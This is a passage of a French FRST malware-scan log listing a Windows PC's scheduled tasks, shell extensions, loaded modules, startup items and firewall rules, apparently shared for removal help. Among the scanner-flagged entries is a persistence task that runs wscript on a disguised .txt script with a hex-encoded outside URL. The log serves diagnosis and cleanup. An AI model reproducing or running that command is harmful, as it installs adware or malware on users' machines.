{45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2017-12-19] (Avira Operations GmbH & Co. KG) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Applications\Winrar\rarext.dll [2013-12-01] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Applications\Winrar\rarext32.dll [2013-12-01] (Alexander Roshal) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Applications\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Pas de fichier ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-10-20] (Intel Corporation) ContextMenuHandlers5: [igfxOSP] -> {FA507C3F-30C6-4DCA-9EE5-2656072EEC14} => C:\WINDOWS\system32\igfxOSP.dll [2017-10-20] (Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-12-15] (NVIDIA Corporation) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Applications\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes) ContextMenuHandlers6: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2017-12-19] (Avira Operations GmbH & Co. KG) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\Applications\Winrar\rarext.dll [2013-12-01] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\Applications\Winrar\rarext32.dll [2013-12-01] (Alexander Roshal) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {091B81BF-4485-413E-8D14-9C816EA811A6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION Task: {10263AAE-5573-40C5-BF01-B57C6E60486F} - System32\Tasks\CCleanerSkipUAC => D:\Applications\CCleaner\CCleaner64.exe [2017-09-20] (Piriform Ltd) Task: {11E64A8B-150E-4D0F-9227-76CF23A7FD40} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION Task: {1B7DC6A1-B76A-42FE-A096-D6C69CD8FB09} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-10-11] (NVIDIA Corporation) Task: {24834A10-B438-4D6D-9249-E3501B21E8E9} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-10-11] (NVIDIA Corporation) Task: {27674EBE-AFFF-4C89-A444-B59D51359B0C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION Task: {34DCB971-4C8D-4050-BB06-BAADA3E2F291} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-10-11] (HP Inc.) Task: {34E1D366-314A-4AE6-B2E2-BD8C00568EF3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2017-06-22] (HP Inc.) Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe Task: {38C5E7C0-97E0-4D3F-9DAF-F6D4AA90ECFF} - System32\Tasks\Avira SystrayStartTrigger => Avira.SystrayStartTrigger.exe Task: {416D5F1C-F032-4605-854F-FB163416947F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2017-09-27] (HP Inc.) Task: {440A9269-3B62-4247-87B1-C7AB3FCC703D} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\SymErr.exe Task: {48FE49A3-489D-46F3-9F62-1CDCD4D87761} - \Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 -> Pas de fichier <==== ATTENTION Task: {54275DB8-CFA2-406A-93E7-602EAA9A00A7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {63C9D6D0-CBB8-4899-9504-BE0634AEB776} - System32\Tasks\MSI_Reminder => C:\Program Files (x86)\MSI\MSI Remind Manager\MSI Reminder.exe Task: {645D8CF3-748B-4E78-9963-6BD7D7B2C395} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION Task: {65BA4F55-8E6D-453A-82D5-520C6758ABF8} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe Task: {6713C182-17C8-486B-8398-CBBF8D00422A} - System32\Tasks\MSI_Dragon Gaming Center => C:\Program Files (x86)\MSI\Dragon Gaming Center\mDispatch.exe [2014-01-24] (TODO: <公司名稱>) Task: {6838DE45-49A9-4AA6-BCEE-78B1DAC5CB80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2017-07-24] (Apple Inc.) Task: {68C51D37-3A0D-423F-8658-6C931EC88EFC} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\SymErr.exe Task: {6E2A3726-6F51-4691-9071-5E0D7FDC99F1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION Task: {6E30DB98-AADA-4AC7-9D55-039FC82333FC} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION Task: {715EC068-D383-4CA3-BF17-04F694A6EBE0} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-01-08] (Microsoft Corporation) Task: {76A22264-20F5-451E-B2D0-312FA5565D3A} - System32\Tasks\HPCeeScheduleForTruff => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.) Task: {7C8818F4-756B-41A1-B2A7-3B3E55C8CC92} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION Task: {85506B20-6CB4-4655-9FF1-53B38AF6769E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-12-25] (Microsoft Corporation) Task: {97E9DA0C-91F9-4A3F-871F-6750A9D69FAD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION Task: {9B2A4876-0388-4CD7-AFEA-92466EB30AA7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-11-08] (HP Inc.) Task: {9BD2DED5-0FA3-46C3-B125-6CAD8E118FE8} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2016-08-12] (Intel Corporation) Task: {A1DF5911-EFDC-41EF-BADC-A6F35BDFEA32} - \Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle -> Pas de fichier <==== ATTENTION Task: {A86580AD-D840-4CD9-9230-838456AD1BA8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION Task: {ACDADFC2-AA50-4844-AE71-4F9AF74C0188} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-10-11] (NVIDIA Corporation) Task: {AD419BDB-A96F-41C1-A466-FAF62439DD63} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-10-11] (NVIDIA Corporation) Task: {B0B4D0E0-5970-43CA-8C40-D92A82F3E707} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2017-09-27] (HP Inc.) Task: {B646C129-7A55-4E83-9C49-1AB4A1267034} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-10-11] (NVIDIA Corporation) Task: {BAF47A2C-CC30-481E-9ECE-9ECE7C902683} - System32\Tasks\Avira_Antivirus_Systray => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [2017-12-19] (Avira Operations GmbH & Co. KG) Task: {BB13ACDD-02BD-4BAD-9D7B-5DE2EEA4038B} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2017-11-19] () Task: {C12F3D29-1CF0-412A-A723-0B262B90BFDA} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-10-11] (NVIDIA Corporation) Task: {C86F4607-137B-412C-A318-AF5A090D3C2A} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION Task: {C8A1128C-1466-4B8E-B73A-F24F67AF53A6} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-01-08] (Microsoft Corporation) Task: {CC05B895-5B80-445D-9E30-CB07785D7F17} - System32\Tasks\{7F7CCE09-9C3B-4B52-8905-07FA29C5E9FD} => C:\WINDOWS\system32\pcalua.exe -a "D:\Applications\heure h\generals.exe" -d "D:\Applications\heure h" Task: {D5183CA8-827B-4846-8FC5-5EE923A8BB58} - \Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon -> Pas de fichier <==== ATTENTION Task: {D5D1AC3B-DD44-41D9-8538-66A2DD8CA88E} - \Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle -> Pas de fichier <==== ATTENTION Task: {DB90B2CC-3999-488E-BF5F-9E3FBE61DA84} - \Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock -> Pas de fichier <==== ATTENTION Task: {DB976BC8-49CA-404C-BDC5-6C19A3F1A5BF} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-10-11] (NVIDIA Corporation) Task: {E0241C0C-9DBC-4B56-B227-87C3F0BB25C5} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION Task: {E17007B0-42B9-460D-A89D-8B875963EDFB} - System32\Tasks\Bing Powered Search lorom => C:\Windows\system32\wscript.exe "C:\ProgramData\{F5A030C3-7FE2-BA05-F924-24476366AF89}\dofe.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b46354130333043332d374645322d424130352d463932342d3234343736333636414638397d5c6d696c6f6e65" "433a5c50726f6772616d446174615c7b46354130333043332d374645322d424130352d463932 (l'élément de données a 78 caractères en plus). <==== ATTENTION Task: {E274F7C8-01EC-412F-B47B-6C75BDD59A1B} - System32\Tasks\{2DA358AD-221B-4F77-99ED-AA602DB0F81C} => C:\WINDOWS\system32\pcalua.exe -a C:\Users\Truff\Downloads\Setup.exe -d C:\Users\Truff\Downloads Task: {E3DFC2B2-4E69-4D66-A6A3-DFEE65D9A9B0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2017-09-20] (HP Inc.) Task: {E6596032-5084-4381-BA47-8D941E2E3B7A} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Pas de fichier <==== ATTENTION Task: {E8422F82-9FFA-4C42-8A57-4A875081B509} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2016-08-12] (Intel Corporation) Task: {E8593469-E6D6-4A37-93F3-58909DB4CBCB} - System32\Tasks\RunAsStdUser_MyComGames => C:\Users\Truff\AppData\Local\MyComGames\MyComGames.exe [2017-12-14] (MY.COM B.V.) Task: {E92CB54F-0CBC-4EA6-9BE7-380C7CA9AE4F} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-10-11] (NVIDIA Corporation) Task: {EA1ACA66-F129-4C88-BCED-BE4C73669C64} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION Task: {EFDCF1CE-40A6-4562-AAF3-88AE2BE95A5D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {F48F5D94-AA2D-408B-875F-CE13ECC314BD} - System32\Tasks\{531376EE-B058-0796-CCA4-0204B9CC609A} => C:\Users\Truff\AppData\Local\{BDED8~1\SYNHEL~1.EXE <==== ATTENTION Task: {F6F295C4-30C8-490C-A572-002849B019CA} - \Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time -> Pas de fichier <==== ATTENTION Task: {FB0054A4-A389-45AC-BF47-8213A486F4C5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-12-25] (Microsoft Corporation) Task: {FB524362-210D-4F1E-8A8B-F669D5EB7ED7} - System32\Tasks\{C1D53AFB-CE83-4301-A51D-7263AA76D170} => C:\Windows\system32\pcalua.exe -a C:\Users\Truff\AppData\Roaming\sweet-page\UninstallManager.exe -c -ptid=cor (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\WINDOWS\Tasks\Bing Powered Search lorom.job => Wscript.exe C:\ProgramData\{F5A030C3-7FE2-BA05-F924-24476366AF89}\dofe.txt <==== ATTENTION Task: C:\WINDOWS\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForTruff.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe Task: C:\WINDOWS\Tasks\{531376EE-B058-0796-CCA4-0204B9CC609A}.job => C:\Users\Truff\AppData\Local\{BDED8~1\SYNHEL~1.EXE <==== ATTENTION ==================== Raccourcis & WMI ======================== (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ShortcutWithArgument: C:\Users\Truff\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData2 ==================== Modules chargés (Avec liste blanche) ============== 2017-01-22 00:46 - 2017-10-11 02:05 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-12-08 01:48 - 2017-12-08 01:48 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2017-12-08 01:48 - 2017-12-08 01:48 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2017-09-29 14:41 - 2017-09-29 14:41 - 000184432 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2016-09-23 16:05 - 2017-12-15 23:34 - 000133704 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2013-09-05 00:17 - 2013-09-05 00:17 - 004300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF 2017-12-14 02:39 - 2017-12-14 02:39 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-12-14 02:39 - 2017-12-14 02:39 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2018-01-03 14:15 - 2018-01-03 14:16 - 000086528 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2018-01-03 14:15 - 2018-01-03 14:16 - 000195072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2018-01-03 14:15 - 2018-01-03 14:17 - 024670720 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2018-01-03 14:15 - 2018-01-03 14:16 - 002550272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\skypert.dll 2018-01-03 14:15 - 2018-01-03 14:16 - 000667648 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000758784 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\SSEngineLib.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000175104 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\DBUtils.dll 2017-12-21 22:18 - 2017-12-21 22:18 - 000089915 _____ () C:\Users\Truff\AppData\Local\Temp\fcaa5f9b-83be-462f-bb26-c1541883b2c0\CliSecureRT64.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000287744 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\DriverCommunication.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000140288 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\ISSPlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000148480 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\Localization.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000145408 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\Utilities.dll 2013-01-10 06:46 - 2013-01-10 06:46 - 000047616 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\SteelSeriesDrivers\x2api.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 009633280 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\SSEngineWinGui.dll 2013-01-10 06:46 - 2013-01-10 06:46 - 001102336 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\System.Data.SQLite.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000209408 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\CustomWPFColorPicker.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000349696 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\MousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000171008 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\D3MousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000173056 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\KKMousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000171008 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\SRawPlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000307200 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\MLGSenseiPlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000154624 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\WoWGoldPlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000170496 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\GW2MousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000169472 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\CSGOMousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000169984 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\DOTA2MousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000157184 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\WoWWirelessPlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000170496 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\CODMousePlugin.dll 2014-01-23 16:15 - 2014-01-23 16:15 - 000169984 _____ () C:\Program Files\SteelSeries\SteelSeries Engine\WoTMousePlugin.dll 2018-01-09 17:55 - 2018-01-09 17:55 - 004698840 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11712.1001.11.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll 2018-01-09 17:54 - 2018-01-09 17:55 - 000017408 _____ () C:\Program Files\WindowsApps\Microsoft.BingFinance_4.22.3254.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Money.exe 2018-01-09 17:54 - 2018-01-09 17:54 - 018060288 _____ () C:\Program Files\WindowsApps\Microsoft.BingFinance_4.22.3254.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Money.dll 2017-12-20 18:32 - 2017-12-20 18:32 - 005221768 _____ () C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1712.5.0_x64__8wekyb3d8bbwe\Microsoft.Advertising.dll 2016-03-04 16:42 - 2016-03-04 16:43 - 000291328 _____ () C:\Program Files\WindowsApps\Microsoft.BingFinance_4.22.3254.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll 2018-01-04 19:18 - 2018-01-03 10:20 - 004063064 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libglesv2.dll 2018-01-04 19:18 - 2018-01-03 10:20 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libegl.dll 2014-01-28 13:35 - 2013-12-10 00:26 - 001242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll 2017-01-22 00:46 - 2017-10-11 02:05 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-01-22 00:46 - 2017-10-11 02:05 - 070805952 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) HKU\S-1-5-21-1552058139-121831200-1710227419-1002\Software\Classes\.exe: => <==== ATTENTION ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) ==================== Hosts contenu: =============================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2013-08-22 14:25 - 2013-08-22 14:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-1552058139-121831200-1710227419-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Truff\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\20170919_171214.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == HKLM\...\StartupApproved\StartupFolder: => "Killer Network Manager.lnk" HKLM\...\StartupApproved\Run: => "IAStorIcon" HKLM\...\StartupApproved\Run: => "ShadowPlay" HKLM\...\StartupApproved\Run: => "Radio Manager" HKLM\...\StartupApproved\Run: => "SCM" HKLM\...\StartupApproved\Run: => "NvBackend" HKLM\...\StartupApproved\Run: => "BCSSync" HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run: => "GoPro Tray App" HKLM\...\StartupApproved\Run32: => "Sound Blaster Cinema" HKLM\...\StartupApproved\Run32: => "UpdReg" HKLM\...\StartupApproved\Run32: => "BDRegion" HKLM\...\StartupApproved\Run32: => "ROGGX850" HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\StartupApproved\Run: => "TomTomHOME.exe" HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\StartupApproved\Run: => "Skype" HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\StartupApproved\Run: => "CCleaner Monitoring" HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\StartupApproved\Run: => "gflauncher" ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [{FCFD33C9-6EF3-466E-988D-79BBF5C2C78F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{C524B2CE-1862-42DA-B9A9-A0F01D0AF4F8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{0ABD2C6B-4A71-4FBC-B386-8F211DC9AAA6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{C2F345CE-4714-4FF6-8CE1-41DE01F305AD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{26D76E95-C45F-47C3-B78C-051349252E6B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{ED0D6F8C-1044-4C62-93BB-795EB73E1931}] => (Allow) D:\Applications\Quik\GoPro Desktop App\GoProLauncher.exe FirewallRules: [{B91CBA9F-F3CC-44E8-B665-EE551A23DDF4}] => (Allow) D:\Applications\Quik\GoPro Desktop App\GoProIDService.exe FirewallRules: [{6EC5C350-3DBC-42AD-95CA-0C6D6F64EBAD}] => (Allow) D:\Applications\Quik\GoPro Desktop App\GoProMsgBus.exe FirewallRules: [{2A499FAF-D74F-4485-9523-09EE2978058C}] => (Allow) D:\Applications\Quik\GoPro Desktop App\Quik.exe FirewallRules: [{6468C9EE-76EB-4321-9431-5151BD8D4E3D}] => (Allow) D:\Applications\Battlefield 1\bf1.exe FirewallRules: [{D741E44C-8C9D-485A-9F2E-C109CA051DF6}] => (Allow) D:\Applications\Battlefield 1\bf1.exe FirewallRules: [{A9E9279E-18F3-4C4F-9213-D94E11CF1A61}] => (Allow) D:\Applications\Battlefield 1\bf1Trial.exe FirewallRules: [{7E484757-9FE8-4C55-97F5-C8BBF9B03AC6}] => (Allow) D:\Applications\Battlefield 1\bf1Trial.exe FirewallRules: [UDP Query User{7B2B14E3-5027-4D94-8B16-D8C0B474F8B6}D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe FirewallRules: [TCP Query User{53386AC2-985B-40D5-9ED1-40F4DC0507DD}D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\applications\steam\steamapps\common\awesomenauts\awesomenauts.exe FirewallRules: 